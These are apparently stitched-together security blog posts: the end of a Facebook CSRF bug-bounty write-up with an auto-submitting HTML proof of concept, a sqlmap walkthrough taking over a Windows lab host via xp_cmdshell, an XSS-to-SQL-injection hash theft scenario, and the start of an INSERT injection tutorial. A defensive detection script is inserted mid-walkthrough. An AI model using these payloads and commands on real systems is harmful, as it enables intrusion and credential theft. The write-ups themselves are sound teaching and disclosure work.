<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40</span><br />
<br />
<div>
There are many new parameters added in this new feature. The parameter 'fb_dtsg' is like a token, and 'perms' holds the permissions required by the app. The parameters 'redirect_uri' and 'app_id' are app-specific values. The remaining parameters seem static, except 'new_perms' & 'orig_perms'. I started to play with these two dynamic params and, after a few attempts, I knew that these params were no longer needed to add an app.</div>
<div>
<span style="background-color: white;"><br /></span></div>
<div>
Anti-CSRF tokens like 'fb_dtsg' are supposed to be validated server-side. I was shocked to see that in this new feature, somehow the developer missed this point and it was possible to add an app without 'fb_dtsg'. Bang!!<br />
<br />
Final PoC for this CSRF looks like this:<br />
<br />
<br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><html></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><head></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></head></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><body onload=document.forms[0].submit();></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><form action="https://www.facebook.com/connect/uiserver.php" method="POST"></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="perms" value="" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="dubstep" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="new_user_session" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="grant_clicked" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="app_id" value="2389801228" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="app_center" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="is_paid_app" value="" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="app_center_ref" value="appcenter" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="response_type" value="none" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="from_post" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="__uiserv_method" value="permissions.request" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="grant_clicked" value="Play+Game" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></form></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></body></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></html></span></div>
<div>
<br /></div>
<div>
This functionality was used by other apps as well, such as music apps and developer apps. The Facebook Security team awarded $5000 for this bug.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
Facebook was pretty fast to address this issue and resolved it the very next day. I'm very thankful to the Facebook Security Team.</div>
</div>
SQLMap - Operating System Takeover - Windows (AMol NAik, 2012-05-24)<div dir="ltr" style="text-align: left;" trbidi="on">
Today I'm trying out the "OS takeover" feature of sqlmap. sqlmap can be used to obtain a command shell through SQL injection, and it provides the following options for OS-level access:<br />
<br />
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> Operating system access:</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> These options can be used to access the back-end database management</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> system underlying operating system</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-cmd=OSCMD Execute an operating system command</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-shell Prompt for an interactive operating system shell</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-pwn Prompt for an out-of-band shell, meterpreter or VNC</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-bof Stored procedure buffer overflow exploitation</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --priv-esc Database process' user privilege escalation</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --msf-path=MSFPATH Local path where Metasploit Framework is installed</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --tmp-path=TMPPATH Remote absolute path of temporary files directory</span></span></div>
<div style="text-align: left;">
<br />
sqlmap uses different methods to reach the operating system depending on the database type; see the sqlmap documentation for details.<br />
<br />
The target I used for this is HackMe Bank from Foundstone, installed on a Windows XP machine (IP: 192.168.1.4). HackMe Bank is a vulnerable application written in ASP.NET with MSSQL as the back-end database. The attacker machine is BackTrack 5 (IP: 192.168.1.3). Let's browse the target site.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EaAqoVqoSeg/T76cCRq-FLI/AAAAAAAAAlQ/8cvUncEuzJY/s1600/hackme-bank.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://2.bp.blogspot.com/-EaAqoVqoSeg/T76cCRq-FLI/AAAAAAAAAlQ/8cvUncEuzJY/s320/hackme-bank.png" width="320" /></a></div>
<br />
Let's test for basic SQL injection by entering a single quote (') in the username field of the login page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v5WoDgjHcjY/T76cW_ukuBI/AAAAAAAAAlg/6wEqtCUeWDw/s1600/hackme-sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://3.bp.blogspot.com/-v5WoDgjHcjY/T76cW_ukuBI/AAAAAAAAAlg/6wEqtCUeWDw/s320/hackme-sqli.png" width="320" /></a></div>
<br />
And the result is<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-F45HzIGQ9Xc/T76cZZ4WMkI/AAAAAAAAAlo/0gNAD3aZdBM/s1600/hackme-sqli1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://1.bp.blogspot.com/-F45HzIGQ9Xc/T76cZZ4WMkI/AAAAAAAAAlo/0gNAD3aZdBM/s320/hackme-sqli1.png" width="320" /></a></div>
<br />
"Username" field appears to be vulnerable to SQL injection. Let's capture the login request and feed it to sqlmap for further analysis; the -r option of sqlmap takes a saved POST request from a file. The POST request looks like this:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1<br />Host: 192.168.1.4<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-us,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer: http://192.168.1.4/HacmeBank_v2_Website/aspx/login.aspx<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 210<br /><br />__VIEWSTATE=%2FwEPDwUJMzIyNTUyNzAyZGQX7Zm1%2Fne8qfz4FyjBx4QNynpGLw%3D%3D&txtUserName=asd&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=%2FwEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g%2BMJe%2Fifr7tT</span><br />
<br />
<br />
Let's run sqlmap. I used --dbms=MSSQL and --technique=S (stacked queries) to save time, as I already know these details.<br />
<br />
<div style="text-align: left;">
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S<br /><br /> sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting at 14:50:36<br /><br />[14:50:36] [INFO] parsing HTTP request from 'hackme.txt'<br />[14:50:36] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file<br />[14:50:36] [INFO] testing connection to the target url<br />[14:50:37] [INFO] heuristics detected web page charset 'ascii'<br />[14:50:38] [WARNING] reflective value(s) found and filtering out<br />[14:50:38] [WARNING] heuristic test shows that POST parameter 'txtUserName' might not be injectable<br />[14:50:38] [INFO] testing sql injection on POST parameter 'txtUserName'<br />[14:50:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'<br />[14:50:38] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. <br />[14:51:00] [INFO] POST parameter 'txtUserName' is 'Microsoft SQL Server/Sybase stacked queries' injectable <br />[14:51:00] [INFO] checking if the injection point on POST parameter 'txtUserName' is a false positive<br />POST parameter 'txtUserName' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] <br />sqlmap identified the following injection points with a total of 18 HTTP(s) requests:<br />---<br />Place: POST<br />Parameter: txtUserName<br /> Type: stacked queries<br /> Title: Microsoft SQL Server/Sybase stacked queries<br /> Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT<br />---<br /><br />[14:51:15] [INFO] testing Microsoft SQL Server<br />[14:51:15] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries<br />[14:51:20] [INFO] confirming Microsoft SQL Server<br />[14:51:30] [INFO] adjusting time delay to 2 seconds due to good response times<br />[14:51:30] [INFO] the back-end DBMS is Microsoft SQL Server<br />web server operating system: Windows XP<br />web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1<br />back-end DBMS: Microsoft SQL Server 2005<br />[14:51:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'<br /><br />[*] shutting down at 14:51:30<br /><br />root@bt:/pentest/database/sqlmap#</span></div>
<br />
sqlmap has confirmed the injection and reported the web server operating system, the web application technology and the back-end DBMS. From here you can go ahead and enumerate databases, tables, columns, users, etc.<br />
<br />
<div style="text-align: left;">
<b>1. Option: --os-cmd=OSCMD</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
sqlmap executes a single operating system command and displays its output. On Microsoft SQL Server it uses the "xp_cmdshell" extended stored procedure for OS access. I'll demonstrate the "hostname" command:</div>
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-cmd=hostname<br /><br /> sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting at 16:32:07<br /><br />[16:32:07] [INFO] parsing HTTP request from 'hackme.txt'<br />[16:32:07] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file<br />[16:32:07] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file<br />[16:32:07] [INFO] testing connection to the target url<br />[16:32:09] [INFO] heuristics detected web page charset 'ascii'<br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: POST<br />Parameter: txtUserName<br /> Type: stacked queries<br /> Title: Microsoft SQL Server/Sybase stacked queries<br /> Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT<br />---<br /><br />[16:32:09] [INFO] the back-end DBMS is Microsoft SQL Server<br />web server operating system: Windows XP<br />web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1<br />back-end DBMS: Microsoft SQL Server 2005<br />[16:32:09] [INFO] testing if current user is DBA<br />[16:32:09] [INFO] resumed: 1<br />[16:32:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. 
<br />[16:32:18] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries<br />[16:32:19] [INFO] testing if xp_cmdshell extended procedure is usable<br />[16:32:46] [INFO] adjusting time delay to 2 seconds due to good response times<br />[16:33:19] [INFO] xp_cmdshell extended procedure is usable<br />do you want to retrieve the command standard output? [Y/n/a] Y<br />[16:33:24] [INFO] retrieved: XP_FDCC <br />command standard output: 'XP_FDCC'<br /><br />[16:34:24] [INFO] cleaning up the database management system<br />[16:34:24] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'<br /><br />[*] shutting down at 16:34:24<br /><br />root@bt:/pentest/database/sqlmap#</span><br />
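<br />
A defender's view of the same traffic, as an added example that is not from this post or from sqlmap: sqlmap sends its stacked-query probe URL-encoded inside the POST body, so a detection rule has to split and decode the form fields before matching anything. The script below decodes constructed request bodies modelled on the login POST shown earlier and flags the two markers visible in this walkthrough: the quote-plus-semicolon that opens a stacked query together with its WAITFOR DELAY time probe, and a call to xp_cmdshell. The field names txtUserName and txtPassword come from the captured request; the sample bodies, the marker list and the function names are my own constructions, not sqlmap signatures.<br />
<br />
```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# Constructed request bodies modelled on the HacmeBank login POST in this post
# (field names txtUserName/txtPassword are from the captured request; the values are mine).
SAMPLE_BODIES = [
    # benign login attempt
    "txtUserName=asd&txtPassword=asd&btnSubmit=Submit",
    # sqlmap's stacked-query time probe, as it travels on the wire (URL-encoded)
    "txtUserName=asd%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--&txtPassword=asd&btnSubmit=Submit",
    # a stacked call to the xp_cmdshell extended procedure
    "txtUserName=asd%27%3B+EXEC+master..xp_cmdshell+%27hostname%27--&txtPassword=asd",
]

# Heuristic markers (constructed for this example), each checked independently.
MARKERS: List[Tuple[str, "re.Pattern[str]"]] = [
    # a quote closing the string literal followed by ';' starts a second statement
    ("stacked-query", re.compile(r"'\s*;")),
    # MSSQL time-based probe, the exact construct sqlmap used above
    ("time-based-probe", re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE)),
    # extended procedure that turns a DBA-level injection into OS command execution
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)),
]


def classify_body(body: str) -> Dict[str, List[str]]:
    """Return {parameter: [marker names]} for every form field that trips a marker.

    parse_qs splits the body into fields and percent-decodes each value, so a
    marker is attributed to the parameter that carried it (here txtUserName).
    """
    hits: Dict[str, List[str]] = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            found = [label for label, rx in MARKERS if rx.search(value)]
            if found:
                hits.setdefault(name, []).extend(found)
    return hits


def scan(bodies: List[str]) -> List[Tuple[int, Dict[str, List[str]]]]:
    """Scan a batch of bodies and keep only the flagged ones with their index."""
    report = []
    for index, body in enumerate(bodies):
        hits = classify_body(body)
        if hits:
            report.append((index, hits))
    return report


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_BODIES):
        print(f"request #{index}: {hits}")
```
<br />
The xp_cmdshell signal is the one to act on: the sqlmap output above shows it first confirming that the current user is DBA, which is what lets it use the procedure at all, so running the application with a non-sysadmin login removes this path regardless of the injection. The time-based probe also leaves a second trace in access logs: a cluster of requests to login.aspx whose response times sit a fixed few seconds above the baseline, matching the delay in the payload.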
<br />
<br />
<b>2. Option: --os-shell</b><br />
<br />
sqlmap drops you into an interactive prompt where you can run one command after another.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S --os-shell<br /><br /> sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting at 16:34:33<br /><br />[16:34:33] [INFO] parsing HTTP request from 'hackme.txt'<br />[16:34:33] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file<br />[16:34:33] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file<br />[16:34:33] [INFO] testing connection to the target url<br />[16:34:34] [INFO] heuristics detected web page charset 'ascii'<br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: POST<br />Parameter: txtUserName<br /> Type: stacked queries<br /> Title: Microsoft SQL Server/Sybase stacked queries<br /> Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT<br />---<br /><br />[16:34:34] [INFO] the back-end DBMS is Microsoft SQL Server<br />web server operating system: Windows XP<br />web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1<br />back-end DBMS: Microsoft SQL Server 2005<br />[16:34:34] [INFO] testing if current user is DBA<br />[16:34:34] [INFO] resumed: 1<br />[16:34:34] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. 
<br />[16:34:44] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries<br />[16:34:44] [INFO] testing if xp_cmdshell extended procedure is usable<br />[16:35:11] [INFO] adjusting time delay to 2 seconds due to good response times<br />[16:35:50] [ERROR] invalid character detected. retrying..<br />[16:35:50] [WARNING] increasing time delay to 3 seconds <br />[16:36:10] [INFO] xp_cmdshell extended procedure is usable<br />[16:36:10] [INFO] going to use xp_cmdshell extended procedure for operating system command execution<br />[16:36:10] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER<br />os-shell> hostname<br />do you want to retrieve the command standard output? [Y/n/a] Y<br />[16:40:35] [INFO] retrieved: XP_FDCC <br />command standard output: 'XP_FDCC'<br /><br />os-shell> q<br />[16:43:00] [INFO] cleaning up the database management system<br />[16:43:00] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'<br /><br />[*] shutting down at 16:43:00<br /><br />root@bt:/pentest/database/sqlmap#</span><br />
<br />
<b>3. Option: --os-pwn</b><br />
<br />
sqlmap also provides several ways to reach the database server host, such as a Metasploit meterpreter session, an out-of-band shell and VNC; again, read the sqlmap documentation for details. The following video demonstrates the meterpreter reverse shell technique:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/UoPg2_c2-9s/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/UoPg2_c2-9s?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" />
<param name="bgcolor" value="#FFFFFF" />
<embed width="320" height="266" src="http://www.youtube.com/v/UoPg2_c2-9s?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash"></embed></object></div>
<br />
This concludes the operating system takeover with sqlmap. In the next blog post, I'll try to take over a Linux host.<br />
<br />
Hope you like this. Let me know your views, comments, suggestions, etc.</div>SQL Injection Via XSS (AMol NAik, 2012-02-06)<div dir="ltr" style="text-align: left;" trbidi="on"><br />
A few days ago, G4H member <a href="http://www.garage4hackers.com/members/mandi/">mandi</a> from <a href="http://www.garage4hackers.com/">www.garage4hackers.com</a> (my second home) asked about an XSS-to-SQLi attack. His scenario: the main site has a <a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29">cross-site scripting</a> vulnerability and the admin panel has <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a>, but the page with the SQL injection is only accessible to the admin. The question was whether the XSS on the main site can be used to exploit the SQL injection in the admin panel and compromise the admin account. <br />
<br />
Here is my answer with following scenario: <br />
<br />
There is a main site which is vulnerable to an XSS flaw (reflected or stored). The same site has an admin panel which is only accessible to admin users, and one of its authenticated pages is vulnerable to SQL injection. The admin panel can be a separate package like cPanel, in which case the SQL injection vulnerability may already be published (exploit-db FTW!!!).<br />
<br />
This is how the admin account can be compromised using SQL injection via XSS: <br />
1. The attacker crafts an XSS payload that uses AJAX to make a request carrying the SQL injection payload. <br />
2. He sends the payload to the admin user. <br />
3. When the admin user, logged in to the admin panel, clicks the attacker's link, the SQL injection in the admin page is exploited and returns the usernames and password hashes from the admin table. <br />
4. The attacker then submits the returned data to his own site using AJAX and cracks the password hashes offline.<br />
<br />
Video Demonstration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/2b0VD4_rg8Q/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/2b0VD4_rg8Q?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" /><param name="bgcolor" value="#FFFFFF" /><embed width="320" height="266" src="http://www.youtube.com/v/2b0VD4_rg8Q?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash"></embed></object></div><br />
<br />
Any suggestions, comments are welcome.<br />
<br />
<b>Update:</b><br />
As rightly pointed out by <a href="http://twitter.com/antisnatchor" target="_blank">@antisnatchor</a> on Twitter, the combination of XSS on the main site and SQL injection in the admin panel can also be exploited with the BeEF tunneling proxy technique. In tunneling proxy mode, BeEF uses the hooked browser (in this case the admin's browser) as a proxy to reach authenticated sessions (in this case the admin panel).<br />
Check <a href="http://www.youtube.com/user/TheBeefproject#p/a/u/1/Z4cHyC3lowk">BeEF Tunneling Proxy in action</a><br />
<br />
</div>SQL Injection in INSERT Query (AMol NAik, 2012-02-02)<div dir="ltr" style="text-align: left;" trbidi="on">SQL injection is one of the most exploited issues in web application security and has held a place in the OWASP Top 10 since 2004. Many blog posts and papers cover injection into SELECT queries through the WHERE or HAVING clause. Today I’m going to discuss SQL injection in the INSERT query.<br />
<br />
<b>The Basics:</b><br />
<br />
An INSERT query with a VALUES clause inserts rows into an existing table using explicitly specified values. The syntax of the INSERT query is (source: <a href="http://dev.mysql.com/doc/refman/5.5/en/insert.html">http://dev.mysql.com/doc/refman/5.5/en/insert.html</a>):<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> [INTO] tbl_name [(col_name,...)]</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> {VALUES | VALUE} ({expr | DEFAULT},...),(...),...</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> [ ON DUPLICATE KEY UPDATE</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> col_name=expr</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> [, col_name=expr] ... ]</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">tbl_name</span> is the table into which rows should be inserted. A comma-separated list of column names can be provided following the table name. In this case, a value for each named column must be provided by the <span style="font-family: 'Courier New', Courier, monospace;">VALUES</span> list.<br />
<br />
To insert a record into a table, the following query is used:<br />
<br />
<div style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT INTO tbl_name (a,b,c) VALUES('data','data','data');</div><br />
<div class="MsoNormal" style="text-indent: 0in;"><span style="text-indent: 0in;">I hope this is enough to introduce the INSERT query.</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><b><br />
</b><br />
<b>The Injection:</b><br />
<span style="text-indent: 0in;">A common use of the INSERT query in a web application is a comment page.</span><br />
<span style="text-indent: 0in;"><br />
</span></div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-2-hyzsiOmv8/TyqrzCjcGRI/AAAAAAAAAiI/kprq61RaUig/s1600/sqli-comments.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="http://3.bp.blogspot.com/-2-hyzsiOmv8/TyqrzCjcGRI/AAAAAAAAAiI/kprq61RaUig/s320/sqli-comments.jpg" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;">The page asks for a name, an email address and the comment, and inserts this data into the database using the following query:<br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT INTO comments (name, email, comment) VALUES ('lol','lol','lol');</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
In this query, an attacker can inject arbitrary data if the inputs are not sanitized. Let’s check this by placing a single quote (') in the name field.<br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-vqO_wrVpbvA/TyqsQ7Kxr6I/AAAAAAAAAiQ/YHHAWY8FhA8/s1600/sql.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-vqO_wrVpbvA/TyqsQ7Kxr6I/AAAAAAAAAiQ/YHHAWY8FhA8/s1600/sql.jpg" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;">This results in a SQL error, as expected:<br />
<br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd', 'asd')' at line 1</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
Now we can supply arbitrary data for all the fields, ending the input with a comment string so that the rest of the original statement is ignored. <br />
<br />
